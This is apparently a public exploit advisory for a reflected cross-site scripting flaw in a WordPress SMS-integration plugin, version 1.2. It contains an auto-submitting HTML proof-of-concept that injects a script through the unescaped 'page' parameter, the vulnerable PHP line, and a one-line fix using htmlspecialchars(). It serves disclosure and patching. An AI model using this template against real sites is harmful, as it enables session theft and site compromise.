___________________________________________________ | | Exploit Title: Wordpress Contact Form 7 International Sms Integration Plugin Cross Site Scripting | Exploit Author: Ashiyane Digital security Team | Vendor Homepage : https://wordpress.org/plugins/cf7-international-sms-integration/ | Software Link: https://downloads.wordpress.org/plugin/cf7-international-sms-integration.1.2.zip | Version: 1.2 | Date: 2017 - 07 - 9 | Tested on: Kali-Linux /FireFox |__________________________________________________ Exploit : <html> <body onload="document.exploit.submit()"> <form id="smslog-filter" method="get" action="http://Target/PATH/wp-content/plugins/ cf7-international-sms-integration/includes/admin/class-sms-log-display.php "> <input type="hidden" name="page" value=""/><script>alert(1)</script>" /> <input type="hidden" name="tab" value="smslogs" /> </form> </body> </html> __________________________________________________ Vulnerable method : $_GET Vulnerable File : wp-content/plugins/cf7-international-sms-integration/includes/admin/class-sms-log-display.php Vulnerable code: line 366 : <form id="smslog-filter" method="get" action="<?php echo $current_url; ?> "> <input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" /> <input type="hidden" name="tab" value="smslogs" /> <?php $testListTable->display() ?> </form> __________________________________________________ #patch: For fix this vulnerability you use htmlspecialchars() function . __________________________________________________ Discovered By : M.R.S.L.Y __________________________________________________